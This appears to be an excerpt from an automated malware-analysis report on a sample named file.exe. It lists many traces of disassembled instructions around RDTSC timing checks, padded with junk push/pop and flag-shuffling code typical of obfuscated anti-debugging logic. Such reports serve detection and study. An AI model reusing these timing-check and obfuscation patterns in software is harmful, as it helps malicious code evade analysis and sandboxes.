Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C04D5 second address: 73C053B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC85D338E32h 0x00000012 and eax, 35645D08h 0x00000018 jmp 00007FC85D338E2Bh 0x0000001d popfd 0x0000001e jmp 00007FC85D338E38h 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+50h] 0x00000027 pushad 0x00000028 mov al, B2h 0x0000002a popad 0x0000002b mov dword ptr [esi+14h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FC85D338E30h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C053B second address: 73C0541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0541 second address: 73C0552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0552 second address: 73C0556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0556 second address: 73C055C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C055C second address: 73C05DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+18h], eax 0x0000000c jmp 00007FC85CDF02AEh 0x00000011 mov eax, dword ptr [ebx+58h] 0x00000014 jmp 00007FC85CDF02B0h 0x00000019 mov dword ptr [esi+1Ch], eax 0x0000001c pushad 0x0000001d mov bh, ch 0x0000001f pushfd 0x00000020 jmp 00007FC85CDF02B3h 0x00000025 sbb si, 12CEh 0x0000002a jmp 00007FC85CDF02B9h 0x0000002f popfd 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+5Ch] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FC85CDF02ADh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C05DD second address: 73C0631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC85D338E33h 0x00000015 adc ecx, 43E8263Eh 0x0000001b jmp 00007FC85D338E39h 0x00000020 popfd 0x00000021 mov si, 7D87h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0631 second address: 73C0674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c jmp 00007FC85CDF02AEh 0x00000011 mov dword ptr [esi+24h], eax 0x00000014 jmp 00007FC85CDF02B0h 0x00000019 mov eax, dword ptr [ebx+64h] 0x0000001c pushad 0x0000001d mov di, si 0x00000020 pushad 0x00000021 mov ax, FF4Fh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0674 second address: 73C06D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esi+28h], eax 0x00000009 pushad 0x0000000a mov si, 1A9Dh 0x0000000e mov eax, 7DEBC399h 0x00000013 popad 0x00000014 mov eax, dword ptr [ebx+68h] 0x00000017 jmp 00007FC85D338E34h 0x0000001c mov dword ptr [esi+2Ch], eax 0x0000001f jmp 00007FC85D338E30h 0x00000024 mov ax, word ptr [ebx+6Ch] 0x00000028 pushad 0x00000029 movzx ecx, bx 0x0000002c mov al, dl 0x0000002e popad 0x0000002f mov word ptr [esi+30h], ax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC85D338E31h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C06D4 second address: 73C0745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC85CDF02AAh 0x00000018 or eax, 5E566F18h 0x0000001e jmp 00007FC85CDF02ABh 0x00000023 popfd 0x00000024 movzx esi, dx 0x00000027 popad 0x00000028 popad 0x00000029 mov word ptr [esi+32h], ax 0x0000002d jmp 00007FC85CDF02AEh 0x00000032 mov eax, dword ptr [ebx+0000008Ch] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC85CDF02B7h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0745 second address: 73C0788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c jmp 00007FC85D338E2Eh 0x00000011 mov eax, dword ptr [ebx+18h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FC85D338E2Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0788 second address: 73C078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C078D second address: 73C07D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 mov cl, CAh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+38h], eax 0x0000000d jmp 00007FC85D338E31h 0x00000012 mov eax, dword ptr [ebx+1Ch] 0x00000015 jmp 00007FC85D338E2Eh 0x0000001a mov dword ptr [esi+3Ch], eax 0x0000001d jmp 00007FC85D338E30h 0x00000022 mov eax, dword ptr [ebx+20h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C07D8 second address: 73C07DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C07DC second address: 73C07F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C07F9 second address: 73C084F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC85CDF02B7h 0x00000008 pop eax 0x00000009 jmp 00007FC85CDF02B9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esi+40h], eax 0x00000014 pushad 0x00000015 mov ebx, eax 0x00000017 mov ch, B5h 0x00000019 popad 0x0000001a lea eax, dword ptr [ebx+00000080h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC85CDF02AEh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C084F second address: 73C08CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC85D338E31h 0x00000008 pushfd 0x00000009 jmp 00007FC85D338E30h 0x0000000e jmp 00007FC85D338E35h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 00000001h 0x00000019 jmp 00007FC85D338E2Eh 0x0000001e nop 0x0000001f jmp 00007FC85D338E30h 0x00000024 push eax 0x00000025 pushad 0x00000026 mov edx, 63D8B314h 0x0000002b push edi 0x0000002c mov eax, 231C5E5Fh 0x00000031 pop ecx 0x00000032 popad 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FC85D338E2Dh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C08CF second address: 73C08D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C08D3 second address: 73C08D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C08D9 second address: 73C08DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C08DF second address: 73C0920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC85D338E2Eh 0x00000015 sbb cl, 00000058h 0x00000018 jmp 00007FC85D338E2Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0920 second address: 73C0931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, ecx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov bh, 2Dh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0931 second address: 73C0981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c call 00007FC85D338E32h 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 pushfd 0x00000014 jmp 00007FC85D338E30h 0x00000019 and si, 7448h 0x0000001e jmp 00007FC85D338E2Bh 0x00000023 popfd 0x00000024 popad 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0981 second address: 73C0985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0985 second address: 73C098B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C09B8 second address: 73C09BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C09BE second address: 73C0A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d jmp 00007FC85D338E36h 0x00000012 test edi, edi 0x00000014 jmp 00007FC85D338E30h 0x00000019 js 00007FC8CC1B7AF0h 0x0000001f jmp 00007FC85D338E30h 0x00000024 mov eax, dword ptr [ebp-0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A18 second address: 73C0A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A1C second address: 73C0A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A20 second address: 73C0A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A26 second address: 73C0A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007FC85D338E30h 0x00000011 lea eax, dword ptr [ebx+78h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC85D338E37h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A6D second address: 73C0A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85CDF02B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A85 second address: 73C0A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A89 second address: 73C0AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007FC85CDF02B7h 0x0000000f nop 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov bh, al 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0AB0 second address: 73C0AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0AB4 second address: 73C0B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov edx, 5B7C8CDEh 0x0000000c pushfd 0x0000000d jmp 00007FC85CDF02AFh 0x00000012 or ecx, 15D3E98Eh 0x00000018 jmp 00007FC85CDF02B9h 0x0000001d popfd 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FC85CDF02AAh 0x0000002a adc ax, FC08h 0x0000002f jmp 00007FC85CDF02ABh 0x00000034 popfd 0x00000035 mov bl, al 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0B15 second address: 73C0B94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85D338E30h 0x00000009 sub ecx, 47501E68h 0x0000000f jmp 00007FC85D338E2Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b jmp 00007FC85D338E32h 0x00000020 lea eax, dword ptr [ebp-08h] 0x00000023 pushad 0x00000024 mov dl, ah 0x00000026 pushfd 0x00000027 jmp 00007FC85D338E33h 0x0000002c sub cx, 7F0Eh 0x00000031 jmp 00007FC85D338E39h 0x00000036 popfd 0x00000037 popad 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0B94 second address: 73C0B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0B9A second address: 73C0BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0BA0 second address: 73C0BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC85CDF02ABh 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC85CDF02B5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0C19 second address: 73C0C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85D338E2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0C29 second address: 73C0C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0C2D second address: 73C0C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FC85D338E33h 0x00000013 adc cx, FF4Eh 0x00000018 jmp 00007FC85D338E39h 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0C6D second address: 73C0C82 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 8757h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 js 00007FC8CBC6ECE9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0C82 second address: 73C0C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0C86 second address: 73C0C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0C8A second address: 73C0C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0C90 second address: 73C0CB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC85CDF02ADh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0CB3 second address: 73C0D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, B2BEh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+08h], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC85D338E2Bh 0x00000014 add si, 476Eh 0x00000019 jmp 00007FC85D338E39h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FC85D338E30h 0x00000025 sub esi, 03CF5AE8h 0x0000002b jmp 00007FC85D338E2Bh 0x00000030 popfd 0x00000031 popad 0x00000032 lea eax, dword ptr [ebx+70h] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push ebx 0x00000039 pop eax 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0D19 second address: 73C0D49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC85CDF02B5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0D49 second address: 73C0DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85D338E37h 0x00000009 sbb esi, 6E969CEEh 0x0000000f jmp 00007FC85D338E39h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC85D338E30h 0x0000001b sbb si, C468h 0x00000020 jmp 00007FC85D338E2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 nop 0x0000002a pushad 0x0000002b mov dl, ah 0x0000002d mov ah, dh 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007FC85D338E33h 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FC85D338E35h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0DDC second address: 73C0DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85CDF02ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0DEC second address: 73C0E3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-18h] 0x0000000e jmp 00007FC85D338E36h 0x00000013 nop 0x00000014 pushad 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 mov cx, 1EEFh 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC85D338E37h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0E3D second address: 73C0E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0E96 second address: 73C0E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0E9C second address: 73C0EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0EA0 second address: 73C0F39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007FC85D338E2Bh 0x0000000f test edi, edi 0x00000011 jmp 00007FC85D338E36h 0x00000016 js 00007FC8CC1B7608h 0x0000001c jmp 00007FC85D338E30h 0x00000021 mov eax, dword ptr [ebp-14h] 0x00000024 pushad 0x00000025 call 00007FC85D338E2Eh 0x0000002a pushfd 0x0000002b jmp 00007FC85D338E32h 0x00000030 sbb ecx, 0300EC28h 0x00000036 jmp 00007FC85D338E2Bh 0x0000003b popfd 0x0000003c pop ecx 0x0000003d mov bh, 78h 0x0000003f popad 0x00000040 mov ecx, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC85D338E37h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0F39 second address: 73C0FF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FC85CDF02B0h 0x0000000c or ecx, 6D1300E8h 0x00000012 jmp 00007FC85CDF02ABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FC85CDF02B4h 0x00000025 or ecx, 78811348h 0x0000002b jmp 00007FC85CDF02ABh 0x00000030 popfd 0x00000031 push ecx 0x00000032 jmp 00007FC85CDF02AFh 0x00000037 pop ecx 0x00000038 popad 0x00000039 mov edx, 762C06ECh 0x0000003e jmp 00007FC85CDF02AFh 0x00000043 sub eax, eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 jmp 00007FC85CDF02B0h 0x0000004d pushfd 0x0000004e jmp 00007FC85CDF02B2h 0x00000053 and esi, 3DB8C338h 0x00000059 jmp 00007FC85CDF02ABh 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0FF1 second address: 73C0FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0FF7 second address: 73C0FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0FFB second address: 73C1013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [edx], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC85D338E2Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1013 second address: 73C1056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov cl, 39h 0x0000000d pushfd 0x0000000e jmp 00007FC85CDF02B1h 0x00000013 or al, 00000036h 0x00000016 jmp 00007FC85CDF02B1h 0x0000001b popfd 0x0000001c popad 0x0000001d test eax, eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C1056 second address: 73C105C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C105C second address: 73C10A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 257EB017h 0x00000008 mov ecx, 2FB436B3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007FC8CBC6E916h 0x00000016 jmp 00007FC85CDF02B6h 0x0000001b mov edx, dword ptr [ebp+08h] 0x0000001e jmp 00007FC85CDF02B0h 0x00000023 mov eax, dword ptr [esi] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C10A3 second address: 73C10C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C10C0 second address: 73C10C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C10C6 second address: 73C10F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC85D338E30h 0x00000013 add esi, 0C16A8A8h 0x00000019 jmp 00007FC85D338E2Bh 0x0000001e popfd 0x0000001f push esi 0x00000020 pop edx 0x00000021 popad 0x00000022 rdtsc
